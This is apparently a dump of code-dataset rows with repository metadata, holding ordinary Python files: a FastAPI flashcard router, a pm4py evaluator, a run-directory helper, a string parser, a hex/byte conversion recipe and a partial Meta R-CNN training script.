# Get flashcards of specific category
@router.get("/{category}", response_model=List[schemas.Flashcard])
async def get_flashcards_specific_category(
category: str,
user: schemas.User = Depends(get_current_user)
) -> List[schemas.Flashcard]:
# Fetch user's flashcards with category: category
flashcards = await models.Flashcard.filter(user_id=user.id, category=category)
if not flashcards:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"the category '{category}' does not exist"
)
return [
*map(
lambda flashcard: schemas.Flashcard.from_orm(flashcard),
flashcards
)
]
# Get flashcard by ID
@router.get("/id/{flashcard_id}", response_model=schemas.Flashcard)
async def get_flashcard_by_id(
flashcard_id: int,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Fetch user's flashcard with flashcard ID: flashcard_id
flashcard = await models.Flashcard.get_or_none(id=flashcard_id, user_id=user.id)
if flashcard is None:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"flashcard does not exist"
)
return schemas.Flashcard.from_orm(flashcard)
# Update flashcard by ID
@router.put("/id/{flashcard_id}", response_model=schemas.Flashcard)
async def update_flashcard_by_id(
flashcard_id: int,
updated_flashcard: schemas.FlashcardCreate,
user: schemas.User = Depends(get_current_user)
) -> schemas.Flashcard:
# Update user's flashcard with flashcard ID: flashcard_id
updated = await models.Flashcard.filter(id=flashcard_id, user_id=user.id).update(
**updated_flashcard.dict()
)
if not updated: # flashcard with ID: flashcard_id does not exist
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"flashcard does not exist"
)
return schemas.Flashcard.from_orm(
await models.Flashcard.filter(
id=flashcard_id,
user_id=user.id
).get()
)
# Bulk change category name
@router.put("/{category}", response_model=schemas.RenameFlashcardCategory)
async def update_category_name(
category: str,
new_category_name: str,
user: schemas.User = Depends(get_current_user)
) -> schemas.RenameFlashcardCategory:
# Update category name for user's set of flashcards
updated = await models.Flashcard.filter(user_id=user.id, category=category).update(
category=new_category_name
)
if not updated:
raise HTTPException(
status_code=status.HTTP_404_NOT_FOUND,
detail=f"category does not exist"
)
return schemas.RenameFlashcardCategory(
current_category_name=category,
new_category_name=new_category_name
)
# Delete flashcard by ID
@router.delete("/id/{flashcard_id}", response_model=int)
async def delete_flashcard_by_id(
flashcard_id: int,
user: schemas.User = Depends(get_current_user)
) -> int:
# Delete flashcard with flashcard ID: flashcard_id
await models.Flashcard.filter(id=flashcard_id, user_id=user.id).delete()
return status.HTTP_204_NO_CONTENT
# Delete flashcard by category
@router.delete("/{category}", response_model=int)
async def delete_flashcards_by_category(
category: str,
user: schemas.User = Depends(get_current_user)
) -> int:
# Delete all flashcards with category: category
await models.Flashcard.filter(category=category, user_id=user.id).delete()
return status.HTTP_204_NO_CONTENT | 3,636 | 0 | 176 |
8efe44c0c18ac4acd87d73e2cad4d86b35c3048e | 1,654 | py | Python | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-19T04:02:46.000Z | 2022-01-19T04:02:46.000Z | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2021-11-19T07:21:48.000Z | 2021-11-19T07:21:48.000Z | ws2122-lspm/Lib/site-packages/pm4py/evaluation/wf_net/evaluator.py | Malekhy/ws2122-lspm | e4dc8b801d12f862b8ef536a0f125f346f085a00 | [
"MIT"
] | 1 | 2022-01-14T17:15:38.000Z | 2022-01-14T17:15:38.000Z | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import warnings
from enum import Enum
import deprecation
from pm4py.evaluation.wf_net.variants import petri_net
from pm4py.util import exec_utils
@deprecation.deprecated(deprecated_in='2.2.2', removed_in='3.0.0',
details='this wf-net check is moved to the pm4py.algo.analysis package')
| 31.207547 | 102 | 0.696493 | '''
This file is part of PM4Py (More Info: https://pm4py.fit.fraunhofer.de).
PM4Py is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
PM4Py is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with PM4Py. If not, see <https://www.gnu.org/licenses/>.
'''
import warnings
from enum import Enum
import deprecation
from pm4py.evaluation.wf_net.variants import petri_net
from pm4py.util import exec_utils
class Variants(Enum):
PETRI_NET = petri_net
@deprecation.deprecated(deprecated_in='2.2.2', removed_in='3.0.0',
details='this wf-net check is moved to the pm4py.algo.analysis package')
def apply(net, parameters=None, variant=Variants.PETRI_NET):
warnings.warn('this wf-net check is moved to the pm4py.algo.analysis package', DeprecationWarning)
"""
Checks if a Petri net is a workflow net
Parameters
---------------
net
Petri net
parameters
Parameters of the algorithm
variant
Variant of the algorithm, possibe values:
- Variants.PETRI_NET
Returns
---------------
boolean
Boolean value
"""
return exec_utils.get_variant(variant).apply(net, parameters=parameters)
| 550 | 26 | 45 |
cee50dbaf550492b0b7a5acbd949e37a38288f3b | 801 | py | Python | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | null | null | null | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | null | null | null | src/zzsn2021/utils/rundir.py | 2021L-ZZSN/template | 0cea7744701bb702d563acbf0cbd9ecf371f45bf | [
"MIT"
] | 1 | 2021-05-09T21:27:39.000Z | 2021-05-09T21:27:39.000Z | from __future__ import annotations
import os
from datetime import datetime
import coolname # type: ignore
from dotenv import load_dotenv
load_dotenv()
def setup_rundir():
"""
Create a working directory with a randomly generated run name.
"""
date = datetime.now().strftime("%Y%m%d-%H%M")
name = coolname.generate_slug(2) # type: ignore
os.environ['RUN_NAME'] = f'{date}-{name}'
results_root = f'{os.getenv("RESULTS_DIR")}/{os.getenv("WANDB_PROJECT")}'
if os.getenv('RUN_MODE', '').lower() == 'debug':
run_dir = f'{results_root}/_debug/{os.getenv("RUN_NAME")}'
os.environ['WANDB_MODE'] = 'disabled'
else:
run_dir = f'{results_root}/{os.getenv("RUN_NAME")}'
os.makedirs(run_dir, exist_ok=True)
os.environ['RUN_DIR'] = run_dir
| 27.62069 | 77 | 0.656679 | from __future__ import annotations
import os
from datetime import datetime
import coolname # type: ignore
from dotenv import load_dotenv
load_dotenv()
def setup_rundir():
"""
Create a working directory with a randomly generated run name.
"""
date = datetime.now().strftime("%Y%m%d-%H%M")
name = coolname.generate_slug(2) # type: ignore
os.environ['RUN_NAME'] = f'{date}-{name}'
results_root = f'{os.getenv("RESULTS_DIR")}/{os.getenv("WANDB_PROJECT")}'
if os.getenv('RUN_MODE', '').lower() == 'debug':
run_dir = f'{results_root}/_debug/{os.getenv("RUN_NAME")}'
os.environ['WANDB_MODE'] = 'disabled'
else:
run_dir = f'{results_root}/{os.getenv("RUN_NAME")}'
os.makedirs(run_dir, exist_ok=True)
os.environ['RUN_DIR'] = run_dir
| 0 | 0 | 0 |
5ee4f693c91d826992e4ab0a99fcaee72fdb7edb | 2,705 | py | Python | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 8 | 2022-01-25T09:06:34.000Z | 2022-03-28T14:55:45.000Z | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 23 | 2022-01-23T15:15:00.000Z | 2022-03-28T21:47:15.000Z | src/configflow/misc/string.py | volodymyrPivoshenko/configflow | 2158c8395c4913b836c2a27e38c51f5ec519323b | [
"MIT"
] | 1 | 2022-03-15T21:08:19.000Z | 2022-03-15T21:08:19.000Z | """Module for the string helper functions and primitive data types."""
from __future__ import annotations
import ast
import typing
import apm
# WPS600 - inheritance from the str is the only way to implement correct
# error message with all str functionality
class ErrorMessage(str): # noqa: WPS600
"""Implementation of the error message.
Note
----
By default, error messages in the exceptions don't support line breaks
or any formatting, this decorator is solving that problem.
References
----------
1. `New line on error message in KeyError - Python 3.3 <https://stackoverflow.com/questions/
46892261/new-line-on-error-message-in-keyerror-python-3-3>`_
"""
def __repr__(self) -> str:
r"""Get object representation.
Examples
--------
>>> msg = ErrorMessage("\nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].")
>>> repr(msg)
\nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].
>>> raise ValueError(msg)
Traceback (most recent call last):
...
ValueError:
Invalid argument: 'db'.
Expected arguments: ['db2', 'port'].
"""
return self.__str__()
def parse(value: str) -> typing.Optional[typing.Any]:
"""Parse a string value to the appropriate Python object.
Note
----
If a value is a sequence ``list | tuple | set`` then ``parse`` function will be applied
to each element of a sequence.
Warnings
--------
- Currently ``parse`` function supports only primitive data types ``int | str | float``
and sequences ``list | tuple | set``. Sequences such as ``dict`` will be returned as they are
without parsing their inner values.
- If a value can't be parsed it will be returned as it is.
Examples
--------
>>> parse("1.2")
1.2
>>> parse("(1, 2, '3')")
(1, 2, 3)
>>> parse("['85', '0.23', 'cleffa', ['10', ['0.123'], 'blipbug']]")
[85, 0.23, 'cleffa', [10, [0.123], 'blipbug']]
"""
try:
literal = ast.literal_eval(value)
except ValueError:
original_type = type(value)
return (
apm.case(value)
.of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, value)))
.otherwise(lambda _: value)
)
except SyntaxError:
return value
original_type = type(literal)
return (
apm.case(literal)
.of(apm.InstanceOf(float), lambda _: int(literal) if literal.is_integer() else literal)
.of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, literal)))
.otherwise(lambda _: literal)
)
| 29.086022 | 99 | 0.602957 | """Module for the string helper functions and primitive data types."""
from __future__ import annotations
import ast
import typing
import apm
# WPS600 - inheritance from the str is the only way to implement correct
# error message with all str functionality
class ErrorMessage(str): # noqa: WPS600
"""Implementation of the error message.
Note
----
By default, error messages in the exceptions don't support line breaks
or any formatting, this decorator is solving that problem.
References
----------
1. `New line on error message in KeyError - Python 3.3 <https://stackoverflow.com/questions/
46892261/new-line-on-error-message-in-keyerror-python-3-3>`_
"""
def __repr__(self) -> str:
r"""Get object representation.
Examples
--------
>>> msg = ErrorMessage("\nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].")
>>> repr(msg)
\nInvalid argument: 'db'.\nExpected arguments: ['db2', 'port'].
>>> raise ValueError(msg)
Traceback (most recent call last):
...
ValueError:
Invalid argument: 'db'.
Expected arguments: ['db2', 'port'].
"""
return self.__str__()
def parse(value: str) -> typing.Optional[typing.Any]:
"""Parse a string value to the appropriate Python object.
Note
----
If a value is a sequence ``list | tuple | set`` then ``parse`` function will be applied
to each element of a sequence.
Warnings
--------
- Currently ``parse`` function supports only primitive data types ``int | str | float``
and sequences ``list | tuple | set``. Sequences such as ``dict`` will be returned as they are
without parsing their inner values.
- If a value can't be parsed it will be returned as it is.
Examples
--------
>>> parse("1.2")
1.2
>>> parse("(1, 2, '3')")
(1, 2, 3)
>>> parse("['85', '0.23', 'cleffa', ['10', ['0.123'], 'blipbug']]")
[85, 0.23, 'cleffa', [10, [0.123], 'blipbug']]
"""
try:
literal = ast.literal_eval(value)
except ValueError:
original_type = type(value)
return (
apm.case(value)
.of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, value)))
.otherwise(lambda _: value)
)
except SyntaxError:
return value
original_type = type(literal)
return (
apm.case(literal)
.of(apm.InstanceOf(float), lambda _: int(literal) if literal.is_integer() else literal)
.of(apm.InstanceOf(list, set, tuple), lambda _: original_type(map(parse, literal)))
.otherwise(lambda _: literal)
)
| 0 | 0 | 0 |
5024b443babb9d5f7f10c485d8a141f2f3c148b8 | 2,403 | py | Python | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | tdiprima/code | 61a74f5f93da087d27c70b2efe779ac6bd2a3b4f | [
"MIT"
] | 2,023 | 2017-07-29T09:34:46.000Z | 2022-03-24T08:00:45.000Z | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 32 | 2017-09-02T17:20:08.000Z | 2022-02-11T17:49:37.000Z | recipes/Python/510399_Byte_Hex_Hex_Byte_String/recipe-510399.py | unhacker/code | 73b09edc1b9850c557a79296655f140ce5e853db | [
"MIT"
] | 780 | 2017-07-28T19:23:28.000Z | 2022-03-25T20:39:41.000Z | """
HexByteConversion
Convert a byte string to it's hex representation for output or visa versa.
ByteToHex converts byte string "\xFF\xFE\x00\x01" to the string "FF FE 00 01"
HexToByte converts string "FF FE 00 01" to the byte string "\xFF\xFE\x00\x01"
"""
#-------------------------------------------------------------------------------
def ByteToHex( byteStr ):
"""
Convert a byte string to it's hex string representation e.g. for output.
"""
# Uses list comprehension which is a fractionally faster implementation than
# the alternative, more readable, implementation below
#
# hex = []
# for aChar in byteStr:
# hex.append( "%02X " % ord( aChar ) )
#
# return ''.join( hex ).strip()
return ''.join( [ "%02X " % ord( x ) for x in byteStr ] ).strip()
#-------------------------------------------------------------------------------
def HexToByte( hexStr ):
"""
Convert a string hex byte values into a byte string. The Hex Byte values may
or may not be space separated.
"""
# The list comprehension implementation is fractionally slower in this case
#
# hexStr = ''.join( hexStr.split(" ") )
# return ''.join( ["%c" % chr( int ( hexStr[i:i+2],16 ) ) \
# for i in range(0, len( hexStr ), 2) ] )
bytes = []
hexStr = ''.join( hexStr.split(" ") )
for i in range(0, len(hexStr), 2):
bytes.append( chr( int (hexStr[i:i+2], 16 ) ) )
return ''.join( bytes )
#-------------------------------------------------------------------------------
# test data - different formats but equivalent data
__hexStr1 = "FFFFFF5F8121070C0000FFFFFFFF5F8129010B"
__hexStr2 = "FF FF FF 5F 81 21 07 0C 00 00 FF FF FF FF 5F 81 29 01 0B"
__byteStr = "\xFF\xFF\xFF\x5F\x81\x21\x07\x0C\x00\x00\xFF\xFF\xFF\xFF\x5F\x81\x29\x01\x0B"
if __name__ == "__main__":
print "\nHex To Byte and Byte To Hex Conversion"
print "Test 1 - ByteToHex - Passed: ", ByteToHex( __byteStr ) == __hexStr2
print "Test 2 - HexToByte - Passed: ", HexToByte( __hexStr1 ) == __byteStr
print "Test 3 - HexToByte - Passed: ", HexToByte( __hexStr2 ) == __byteStr
# turn a non-space separated hex string into a space separated hex string!
print "Test 4 - Combined - Passed: ", \
ByteToHex( HexToByte( __hexStr1 ) ) == __hexStr2
| 35.338235 | 90 | 0.554307 | """
HexByteConversion
Convert a byte string to it's hex representation for output or visa versa.
ByteToHex converts byte string "\xFF\xFE\x00\x01" to the string "FF FE 00 01"
HexToByte converts string "FF FE 00 01" to the byte string "\xFF\xFE\x00\x01"
"""
#-------------------------------------------------------------------------------
def ByteToHex( byteStr ):
"""
Convert a byte string to it's hex string representation e.g. for output.
"""
# Uses list comprehension which is a fractionally faster implementation than
# the alternative, more readable, implementation below
#
# hex = []
# for aChar in byteStr:
# hex.append( "%02X " % ord( aChar ) )
#
# return ''.join( hex ).strip()
return ''.join( [ "%02X " % ord( x ) for x in byteStr ] ).strip()
#-------------------------------------------------------------------------------
def HexToByte( hexStr ):
"""
Convert a string hex byte values into a byte string. The Hex Byte values may
or may not be space separated.
"""
# The list comprehension implementation is fractionally slower in this case
#
# hexStr = ''.join( hexStr.split(" ") )
# return ''.join( ["%c" % chr( int ( hexStr[i:i+2],16 ) ) \
# for i in range(0, len( hexStr ), 2) ] )
bytes = []
hexStr = ''.join( hexStr.split(" ") )
for i in range(0, len(hexStr), 2):
bytes.append( chr( int (hexStr[i:i+2], 16 ) ) )
return ''.join( bytes )
#-------------------------------------------------------------------------------
# test data - different formats but equivalent data
__hexStr1 = "FFFFFF5F8121070C0000FFFFFFFF5F8129010B"
__hexStr2 = "FF FF FF 5F 81 21 07 0C 00 00 FF FF FF FF 5F 81 29 01 0B"
__byteStr = "\xFF\xFF\xFF\x5F\x81\x21\x07\x0C\x00\x00\xFF\xFF\xFF\xFF\x5F\x81\x29\x01\x0B"
if __name__ == "__main__":
print "\nHex To Byte and Byte To Hex Conversion"
print "Test 1 - ByteToHex - Passed: ", ByteToHex( __byteStr ) == __hexStr2
print "Test 2 - HexToByte - Passed: ", HexToByte( __hexStr1 ) == __byteStr
print "Test 3 - HexToByte - Passed: ", HexToByte( __hexStr2 ) == __byteStr
# turn a non-space separated hex string into a space separated hex string!
print "Test 4 - Combined - Passed: ", \
ByteToHex( HexToByte( __hexStr1 ) ) == __hexStr2
| 0 | 0 | 0 |
6810b1a32afedd13cfa216ce1724b423ebb45fe3 | 24,325 | py | Python | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | train_metarcnn.py | Anqw/meta_edge | 3c4b138f85d0c2c13c6cc1ee71e621737b40525c | [
"AFL-1.1"
] | null | null | null | # --------------------------------------------------------
# Pytorch Meta R-CNN
# Written by Anny Xu, Xiaopeng Yan, based on the code from Jianwei Yang
# --------------------------------------------------------
import _init_paths
import os
import sys
import numpy as np
import argparse
import pprint
import pdb
import time
import collections
import torch
import torch.nn as nn
import torch.optim as optim
import random
from tensorboardX import SummaryWriter
import torchvision.transforms as transforms
from torch.utils.data.sampler import Sampler
from torch.autograd import Variable
import torch.utils.data as Data
from roi_data_layer.roidb import combined_roidb, rank_roidb_ratio, filter_class_roidb
from roi_data_layer.roibatchLoader import roibatchLoader
from model.utils.config import cfg, cfg_from_file, cfg_from_list, get_output_dir
from model.utils.net_utils import weights_normal_init, save_net, load_net, \
adjust_learning_rate, save_checkpoint, clip_gradient
from model.faster_rcnn.resnet import resnet
import pickle
from datasets.metadata import MetaDataset
from collections import OrderedDict
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Train Meta R-CNN network')
# Define training data and Model
parser.add_argument('--dataset', dest='dataset',
help='training dataset:coco2017,coco,pascal_07_12',
default='pascal_voc_0712', type=str)
parser.add_argument('--net', dest='net',
help='metarcnn',
default='metarcnn', type=str)
# Define display and save dir
parser.add_argument('--start_epoch', dest='start_epoch',
help='starting epoch',
default=1, type=int)
parser.add_argument('--epochs', dest='max_epochs',
help='number of epochs to train',
default=21, type=int)
parser.add_argument('--disp_interval', dest='disp_interval',
help='number of iterations to display',
default=100, type=int)
parser.add_argument('--checkpoint_interval', dest='checkpoint_interval',
help='number of iterations to display',
default=10000, type=int)
parser.add_argument('--save_dir', dest='save_dir',
help='directory to save models', default="./models",
type=str)
# Define training parameters
parser.add_argument('--nw', dest='num_workers',
help='number of worker to load data',
default=0, type=int)
parser.add_argument('--cuda', dest='cuda', default=True, type=bool,
help='whether use CUDA')
parser.add_argument('--bs', dest='batch_size',
help='batch_size',
default=1, type=int)
parser.add_argument('--cag', dest='class_agnostic', default=False, type=bool,
help='whether perform class_agnostic bbox regression')
# Define meta parameters
parser.add_argument('--meta_train', dest='meta_train', default=False, type=bool,
help='whether perform meta training')
parser.add_argument('--meta_loss', dest='meta_loss', default=False, type=bool,
help='whether perform adding meta loss')
parser.add_argument('--transductive', dest='transductive', default=True, type=bool,
help='whether perform transductive')
parser.add_argument('--visualization', dest='visualization', default=False, type=bool,
help='whether perform visualization')
parser.add_argument('--phase', dest='phase',
help='the phase of training process',
default=1, type=int)
parser.add_argument('--shots', dest='shots',
help='the number meta input of PRN network',
default=1, type=int)
parser.add_argument('--meta_type', dest='meta_type', default=1, type=int,
help='choose which sets of metaclass')
# config optimization
parser.add_argument('--o', dest='optimizer',
help='training optimizer',
default="sgd", type=str)
parser.add_argument('--lr', dest='lr',
help='starting learning rate',
default=0.001, type=float)
parser.add_argument('--lr_decay_step', dest='lr_decay_step',
help='step to do learning rate decay, unit is epoch',
default=4, type=int)
parser.add_argument('--lr_decay_gamma', dest='lr_decay_gamma',
help='learning rate decay ratio',
default=0.1, type=float)
# set training session
parser.add_argument('--s', dest='session',
help='training session',
default=1, type=int)
# resume trained model
parser.add_argument('--r', dest='resume',
help='resume checkpoint or not',
default=False, type=bool)
parser.add_argument('--checksession', dest='checksession',
help='checksession to load model',
default=1, type=int)
parser.add_argument('--checkepoch', dest='checkepoch',
help='checkepoch to load model',
default=10, type=int)
parser.add_argument('--checkpoint', dest='checkpoint',
help='checkpoint to load model',
default=21985, type=int)
# log and diaplay
parser.add_argument('--use_tfboard', dest='use_tfboard',
help='whether use tensorflow tensorboard',
default=True, type=bool)
parser.add_argument('--log_dir', dest='log_dir',
help='directory to save logs', default='logs',
type=str)
args = parser.parse_args()
return args
if __name__ == '__main__':
args = parse_args()
print('Called with args:')
print(args)
if args.use_tfboard:
writer = SummaryWriter(args.log_dir)
if args.dataset == "coco2017":
args.imdb_name = "coco_2017_train"
args.imdbval_name = "coco_2017_val"
args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
elif args.dataset == "coco":
args.imdb_name = "coco_2014_train+coco_2014_valminusminival"
args.imdbval_name = "coco_2014_minival"
args.set_cfgs = ['ANCHOR_SCALES', '[2, 4, 8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '50']
elif args.dataset == "pascal_voc_0712":
if args.phase == 1: # three types of base and novel classes splits
if args.meta_type == 1:
args.imdb_name = "voc_2007_train_first_split+voc_2012_train_first_split"
elif args.meta_type == 2:
args.imdb_name = "voc_2007_train_second_split+voc_2012_train_second_split"
elif args.meta_type == 3:
args.imdb_name = "voc_2007_train_third_split+voc_2012_train_third_split"
else:
args.imdb_name = "voc_2007_shots" # the default sampled shots saved path of meta classes in the first phase
args.imdbval_name = "voc_2007_test"
args.set_cfgs = ['ANCHOR_SCALES', '[8, 16, 32]', 'ANCHOR_RATIOS', '[0.5,1,2]', 'MAX_NUM_GT_BOXES', '20']
# the number of sets of metaclass
cfg.TRAIN.META_TYPE = args.meta_type
cfg.USE_GPU_NMS = args.cuda
if args.cuda:
cfg.CUDA = True
args.cfg_file = "cfgs/res101_ms.yml"
if args.cfg_file is not None:
cfg_from_file(args.cfg_file)
if args.set_cfgs is not None:
cfg_from_list(args.set_cfgs)
print('Using config:')
pprint.pprint(cfg)
np.random.seed(cfg.RNG_SEED)
#torch.manual_seed(cfg.RNG_SEED) # 为CPU设置随机种子
#torch.cuda.manual_seed(cfg.RNG_SEED) # 为当前GPU设置随机种子
if torch.cuda.is_available() and not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
if args.phase == 1:
# First phase only use the base classes
shots = 200
if args.meta_type == 1: # use the first sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_FIRST
if args.meta_type == 2: # use the second sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_SECOND
if args.meta_type == 3: # use the third sets of base classes
metaclass = cfg.TRAIN.BASECLASSES_THIRD
else:
# Second phase only use fewshot number of base and novel classes
shots = args.shots
if args.meta_type == 1: # use the first sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_FIRST
if args.meta_type == 2: # use the second sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_SECOND
if args.meta_type == 3: # use the third sets of all classes
metaclass = cfg.TRAIN.ALLCLASSES_THIRD
num_ways = len(metaclass)
# prepare meta sets for meta training
if args.meta_train:
# construct the input dataset of PRN network
img_size = 224
if args.phase == 1:
img_set = [('2007', 'trainval'), ('2012', 'trainval')]
else:
img_set = [('2007', 'trainval')]
metadataset = MetaDataset('data/VOCdevkit',
img_set, metaclass, img_size, shots=shots, shuffle=True,phase = args.phase)
# print(metadataset)
metaloader = torch.utils.data.DataLoader(metadataset, batch_size=1, shuffle=False, num_workers=0,
pin_memory=True)
# print(metadataset)
imdb, roidb, ratio_list, ratio_index = combined_roidb(args.imdb_name)
# filter roidb for the second phase
if args.phase == 2:
roidb = filter_class_roidb(roidb, args.shots, imdb)
ratio_list, ratio_index = rank_roidb_ratio(roidb)
imdb.set_roidb(roidb)
train_size = len(roidb)
print('{:d} roidb entries'.format(len(roidb)))
sys.stdout.flush()
output_dir = args.save_dir
if not os.path.exists(output_dir):
os.makedirs(output_dir)
sampler_batch = sampler(train_size, args.batch_size)
dataset = roibatchLoader(roidb, ratio_list, ratio_index, args.batch_size, imdb.num_classes, training=True)
dataloader = torch.utils.data.DataLoader(dataset, batch_size=args.batch_size,
sampler=sampler_batch, num_workers=args.num_workers, pin_memory=False)
# initilize the network here
if args.net == 'metarcnn':
fasterRCNN = resnet(imdb.classes, num_ways, 101, pretrained=True, class_agnostic=args.class_agnostic,
meta_train=args.meta_train, meta_loss=args.meta_loss, transductive=args.transductive, visualization=args.visualization)
fasterRCNN.create_architecture()
# initilize the optimizer here
lr = cfg.TRAIN.LEARNING_RATE
lr = args.lr
params = []
for key, value in dict(fasterRCNN.named_parameters()).items():
if value.requires_grad:
if 'bias' in key:
params += [{'params': [value], 'lr': lr * (cfg.TRAIN.DOUBLE_BIAS + 1), \
'weight_decay': cfg.TRAIN.BIAS_DECAY and cfg.TRAIN.WEIGHT_DECAY or 0}]
else:
params += [{'params': [value], 'lr': lr, 'weight_decay': cfg.TRAIN.WEIGHT_DECAY}]
if args.optimizer == "adam":
lr = lr * 0.1
optimizer = torch.optim.Adam(params)
elif args.optimizer == "sgd":
optimizer = torch.optim.SGD(params, momentum=cfg.TRAIN.MOMENTUM)
if args.cuda:
fasterRCNN.cuda()
if args.resume:
load_name = os.path.join(output_dir,
'{}_metarcnn_{}_{}_{}.pth'.format(args.dataset, args.checksession,
args.checkepoch, args.checkpoint))
print("loading checkpoint %s" % (load_name))
checkpoint = torch.load(load_name)
args.session = checkpoint['session']
args.start_epoch = checkpoint['epoch']
# the number of classes in second phase is different from first phase
if args.phase == 2:
new_state_dict = OrderedDict()
# initilize params of RCNN_cls_score and RCNN_bbox_pred for second phase
RCNN_cls_score_n = nn.Linear(2048, imdb.num_classes)
RCNN_bbox_pred = nn.Linear(2048, 4 * imdb.num_classes)
for k, v in checkpoint['model'].items():
name = k
new_state_dict[name] = v
if 'RCNN_cls_score_n.weight' in k:
new_state_dict[name] = RCNN_cls_score_n.weight
if 'RCNN_cls_score_n.bias' in k:
new_state_dict[name] = RCNN_cls_score_n.bias
if 'RCNN_bbox_pred.weight' in k:
new_state_dict[name] = RCNN_bbox_pred.weight
if 'RCNN_bbox_pred.bias' in k:
new_state_dict[name] = RCNN_bbox_pred.bias
fasterRCNN.load_state_dict(new_state_dict)
elif args.phase == 1:
fasterRCNN.load_state_dict(checkpoint['model'])
optimizer.load_state_dict(checkpoint['optimizer'])
lr = optimizer.param_groups[0]['lr']
if 'pooling_mode' in checkpoint.keys():
cfg.POOLING_MODE = checkpoint['pooling_mode']
print("loaded checkpoint %s" % (load_name))
iters_per_epoch = int(train_size / args.batch_size)
for epoch in range(args.start_epoch, args.max_epochs):
fasterRCNN.train()
loss_temp = 0
start = time.time()
if epoch % (args.lr_decay_step + 1) == 0:
adjust_learning_rate(optimizer, args.lr_decay_gamma)
lr *= args.lr_decay_gamma
data_iter = iter(dataloader)
meta_iter = iter(metaloader)
for step in range(iters_per_epoch):
try:
data = next(data_iter)
except:
data_iter = iter(dataloader)
data = next(data_iter)
# print(data)
im_data_list = []
im_info_list = []
gt_boxes_list = []
num_boxes_list = []
# initilize the tensor holder here.
im_data = torch.FloatTensor(1)
im_info = torch.FloatTensor(1)
num_boxes = torch.LongTensor(1)
gt_boxes = torch.FloatTensor(1)
# ship to cuda
if args.cuda:
im_data = im_data.cuda()
im_info = im_info.cuda()
num_boxes = num_boxes.cuda()
gt_boxes = gt_boxes.cuda()
# make variable
im_data = Variable(im_data)
im_info = Variable(im_info)
num_boxes = Variable(num_boxes)
gt_boxes = Variable(gt_boxes)
if args.meta_train:
# get prn network input data
try:
prndata,prncls = next(meta_iter)
except:
meta_iter = iter(metaloader)
prndata, prncls = next(meta_iter)
#prn_cls = []
#for i in range(len(prncls)):
# prncls_num = prncls[i]
# length = prncls_num.size() - 1
# for prncls_num in enumerate(prncls_num.split(length,0)):
# prn_cls.append(prncls_num[1])
im_data_list.append(Variable(torch.cat(prndata,dim=0).cuda()))
im_info_list.append(prncls)
im_data.data.resize_(data[0].size()).copy_(data[0])
im_info.data.resize_(data[1].size()).copy_(data[1])
gt_boxes.data.resize_(data[2].size()).copy_(data[2])
num_boxes.data.resize_(data[3].size()).copy_(data[3])
im_data_list.append(im_data)
im_info_list.append(im_info)
gt_boxes_list.append(gt_boxes)
num_boxes_list.append(num_boxes)
# print(im_data_list)
# print(im_info_list)
else:
im_data.data.resize_(data[0].size()).copy_(data[0])
im_info.data.resize_(data[1].size()).copy_(data[1])
gt_boxes.data.resize_(data[2].size()).copy_(data[2])
num_boxes.data.resize_(data[3].size()).copy_(data[3])
im_data_list.append(im_data)
im_info_list.append(im_info)
gt_boxes_list.append(gt_boxes)
